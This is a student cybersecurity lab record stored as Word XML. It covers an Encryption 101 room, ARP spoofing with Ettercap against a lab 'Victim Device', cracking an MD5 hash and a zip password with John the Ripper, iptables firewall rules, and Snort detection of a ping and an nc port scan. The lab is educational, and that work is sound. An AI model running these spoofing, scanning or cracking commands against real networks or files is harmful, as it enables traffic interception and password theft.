          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3112622C" w14:textId="5FA86C4F" w:rsidR="000F4FFB" w:rsidRPr="00835F24" w:rsidRDefault="000F4FFB" w:rsidP="00835F24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE2C37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A39016F" w14:textId="6C0CC301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●</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Shift 1 → incorrect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B528EB2" w14:textId="47F8B3D9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●</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Shift 3 → readable text → correct answer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123D8695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39C5C09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293A5E84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50EB4F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F1656E5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EB0B46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CF1FB6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1E6C7BB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47F657B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AF0A6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A06C168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DC23C1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7EF1F7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9567F3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9C1AD9A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49D4549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3D62B2F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CF744D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D6CEFB0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16550C7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3713921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9BFEA30" w14:textId="66D8BA55" w:rsidR="00835F24" w:rsidRPr="000F4FFB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835F24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RESULT :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thus the Encryption 101 room has been successfully completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BD573E" w14:textId="77777777" w:rsidR="000F4FFB" w:rsidRPr="000F4FFB" w:rsidRDefault="000F4FF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05FDDA1F" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="6B40831A" w14:textId="71307A12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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="24F27EF9" w14:textId="40FE58AC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MAN-IN-THE-MIDDLE (MITM) ATTACKS USING THE ETTERCAP TOOL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835F24" w14:paraId="55DDEB64" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76A58B8F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7E7E4E9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6459124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6C502E" w14:textId="3D9C48F3" w:rsidR="00F44251" w:rsidRDefault="00835F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perform network reconnaissance and Man-in-the-Middle attack setup using network commands and packet capturing tools in Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4CC80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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA2B42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OUTPUT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E5D61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1. Checking Network Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46532AB7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7F9A79B5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ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="643C13AE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6FCBEF06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eth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9D99D5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inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.2.15  netmask 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22238CD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8E010A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Viewing Routing Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EC38CD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3F4BF1A8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 -n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F82840F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2D111EF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Destination   Gateway       </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Genmask</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04DE030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0.0.0.0       192.168.1.1   0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54273C2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03C3DE7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21F793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C79486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3DCA74F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3. Discovering Network Devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030B6B8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6827D34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netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5AE068F0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6E26A77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192.168.1.1     Router</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF43A4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192.168.1.10    Victim Device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436BB358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192.168.1.5     Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CC07B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F51D68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4. Enabling IP Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119F85A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2FD65F1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1 &gt; /proc/sys/net/ipv4/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ip_forward</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E0B850B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2AFBE8F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(No output)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2509C6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30F4B3B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Performing ARP Spoofing using Ettercap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369E611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74FECC3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ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T -q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eth0 -M </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>arp:remote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> /192.168.1.10/ /192.168.1.1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DED9AFE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4F5FFEE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ARP poisoning victims:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C1DA4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GROUP 1 : 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DF95C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GROUP 2 : 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7781F823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Starting Unified sniffing...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501958C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77023C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41AA1A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6. Capturing Network Packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB85B6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3797998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4DE95D0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0CA1D977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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38206580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 192.168.1.10 &gt; google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE2ACF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 google.com &gt; 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C12C59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7340D3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C20D8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4CFD8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964EF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0F84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0C63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619F7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30B1DE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24465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AAC3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E1165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0E584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DC774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1B98C4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64833A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 xml:space="preserve">The network configuration was verified, devices in the local network were discovered, IP forwarding was enabled, ARP spoofing was performed using Ettercap, and packets were successfully captured using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E33F084" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="3797250E" w14:textId="7187D47F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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="3C7561C1" w14:textId="4D3EE7EA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DEMONSTRATE HASH CRACKING USING JOHN THE RIPPER TOOL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835F24" w14:paraId="6FEBEF20" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="299EFC21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33B4159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346D87D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18E2AF1" w14:textId="494195E9" w:rsidR="00F44251" w:rsidRDefault="00835F24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perform password cracking using John the Ripper and understand hash identification and cracking techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7612466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3624C38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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6CE1B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Checking John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1CDA2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--version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE95FA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00896C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directory: /home/kali/.john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048D918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Unknown option: "--version"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4614F98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DB68CB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Running John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3FF61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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D05BA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B59995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the Ripper 1.9.0-jumbo-1+bleeding-aec1328d6c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475D9AB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Usage: john [OPTIONS] [PASSWORD-FILES]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D054A1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EF7B4C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Extracting wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE0576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gunzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">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/share/wordlists/rockyou.txt.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C86853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FB0F3E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Creating MD5 hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328ADBB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-n "password123" | md5sum | awk '{print $1}' &gt; hash1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141B9E5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2959B6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076F88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F28816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5. Identifying hash type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF80AC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hashid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C34CE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469885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Analyzing '482c811da5d5b4bc6d497ffa98491e38'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9F5BD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MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9283A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MD4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D2250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NTLM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E3DC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...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A56D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833767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Cracking MD5 hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5955834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--format=raw-md5 --wordlist=/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 hash1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409A543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B9ECEB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Loaded 1 password hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166D873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password123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EA2F1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 completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1C54F9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2F4BE5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Displaying cracked password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3236A69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--show --format=raw-md5 hash1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A27F8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602EAC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?:password123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F5CFF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93965A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Creating a protected zip file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FD360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"secret info" &gt; secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320E37C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zip -e secure.zip secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667FB97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4CFA1B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adding: secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3200324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C96059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9. Extracting zip hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3261615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zip2john secure.zip &gt; zip_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE077F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A66F00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secure.zip/secret.txt PKZIP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Encr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1350A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20ADAA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Cracking zip password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557348C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--wordlist=/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 zip_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BAF94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9F987C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apple (secure.zip/secret.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DAFAF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 completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD9CFF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20CC79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Showing cracked zip password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F52E6C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--show zip_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6BDC6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56F2FDC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secure.zip/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>secret.txt:apple</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="42FFD65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CF009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F56FFD7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7A1CA86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4E3546B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02A494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3149789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AA500B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571A4D77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71AC34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8C1FD4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 The given password hashes were successfully identified and cracked using John the Ripper.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CA687A7" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="09FEB62C" w14:textId="02EFEE5F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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="0B9F6306" w14:textId="4CC13C95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VARIOUS CONFIGURATIONS OF IPTABLES FIREWALL IN LINUX.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835F24" w14:paraId="115A27C9" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BAF023E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3F5B8C0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4BD6861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670B44" w14:textId="4AB4F5A1" w:rsidR="00F44251" w:rsidRDefault="00835F24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configure a firewall in Kali Linux using iptables by setting rules and policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2327E26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C266EA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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7970BF1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Listing current firewall rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755F797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6AC3DFB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76A315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ACCEPT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF3C9D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06934B6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C0390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FORWARD (policy ACCEPT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7859C65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271B0C4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3B24E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OUTPUT (policy ACCEPT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7CDD8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destination**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234C520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F2938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Flushing existing rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12119CF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-F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BFBF8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231A9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Verifying rules after flush</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C02BC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675C8D8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4ADF67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ACCEPT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D42B2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6688A32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2E6FDA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Chain FORWARD (policy ACCEPT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129E051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53358B1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825950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OUTPUT (policy ACCEPT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D2CC5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destination**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F5F23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758C0F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Setting default policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F010B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INPUT DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBED4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FORWARD DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FBD07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OUTPUT ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C78E71B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46BF0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Allowing loopback traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561BC05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lo -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AFB8E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D555F3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Allowing established connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F31BC8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-m state --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ESTABLISHED,RELATED -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1219B2A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EE85C7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Allowing SSH service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332FC48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22 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A93489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F54584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Allowing HTTP service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CBF8C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80 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7912F73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7A25FB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Checking IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3F5AA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addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2886A59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1FB6C07F" w14:textId="49986B15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inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 127.0.0.1/8 scope host lo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4103947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10. Allowing HTTPS service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41645CC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443 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4247D7D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93050F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Blocking ICMP (ping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9FB3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-j DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B1764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D13DDD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12. Saving firewall rules (correct method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3306C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iptables-save |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tee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/iptables/rules.v4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5696FF0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9C3162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***filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C36734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:INPUT DROP [0:0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF0FD7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:FORWARD DROP [0:0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3807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:OUTPUT ACCEPT [0:0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8015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-A INPUT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lo -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD6822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-A INPUT -m state --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> RELATED,ESTABLISHED -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034B4C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22 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC4ED9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80 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDC1D1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443 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A55CF2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-j DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F9017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COMMIT**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BA9E42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56040C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3E6116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C37975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BB560B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53FA115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084BEEE0" w14:textId="7750E3CA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13. Verifying final firewall rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6417C92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7F8D162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298352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DROP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043C089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all  --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</w:p>
    <w:p w14:paraId="0E22402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all  --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state RELATED,ESTABLISHED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5303F3F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dpt:ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59B2C50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dpt:http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A3DCB9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dpt:https</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6FB8AAE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DROP      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--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</w:p>
    <w:p w14:paraId="1A818FE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77B447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FORWARD (policy DROP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFFAE5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CF9F7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OUTPUT (policy ACCEPT)**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55254EA1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3464B6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AC6C0B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5DC560C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0DDBFDB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61628E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B2CC306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F42762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53BA854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35973AC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5B78DB0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DC349C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firewall was successfully configured using iptables by setting default policies, allowing required services, blocking ICMP traffic, and saving the rules.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4F6D430" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="23C925F2" w14:textId="1BF82F4D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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="76C16970" w14:textId="2CDFBD26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SNORT IDS/IPS TO DETECT AND PREVENT REAL TIME THREATS IN TRYHACKME PLATFORM.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835F24" w14:paraId="12E91C2B" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C3721DC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A1AC878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0896B60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D01ECBE" w14:textId="13EA4C61" w:rsidR="00F44251" w:rsidRDefault="00835F24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detect and prevent real-time network attacks using Snort IDS/IPS using the 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 xml:space="preserve"> Snort room.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE411B5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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_4upmf4zbwrq6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1188410C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vydzba94fx2u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6.1 – ICMP Detection (IDS Mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3334193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 in IDS mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B9159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-A console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077F542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ACBF21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**Commencing packet processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D14719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[**] ICMP Ping Detected [**]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5455AD8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{ICMP} 10.49.146.164 -&gt; 8.8.8.8**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EE01E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6CD000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Generating ICMP traffic (Ping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4186A3B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ping -c 4 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6542C25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D27A72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**4 packets transmitted, 0 received, 100% packet loss**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0543770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83B144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Snort successfully detected ICMP ping packets and generated alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D869AFF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pumi5r8egfp" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="0FF51E5A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nl5i8kuowtxr" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="499A23E2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2sa0edcrxyac" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="395F6FFE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4vsrhy8rxcs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="1D58236A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no3qsju1dl01" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="59535F9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k6ks4f8tuc4b" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="6E861125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4" w:name="_ghj0wdo6guyd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Experiment 6.2 – TCP Port Scan Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284C9F9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E944EE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-A console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3AA30FD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CA284F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**[**] TCP Scan Activity Detected [**]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D4C35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{TCP} 10.49.89.5 -&gt; 10.49.146.164:80**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A579E6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E63AFA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Performing Port Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215761C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p in {1..100}; do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>nc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zv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.49.146.164 $p; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304EF8A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0A5944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**Connection refused (for most ports)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3551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Connection to port 22 succeeded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5795333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Connection to port 80 succeeded**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DB76D7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B6ADB1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Snort successfully detected TCP port scan activity and generated alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D64CC8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F079E47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5" w:name="_3oms39jrpsrc" w:colFirst="0" w:colLast="0"/>
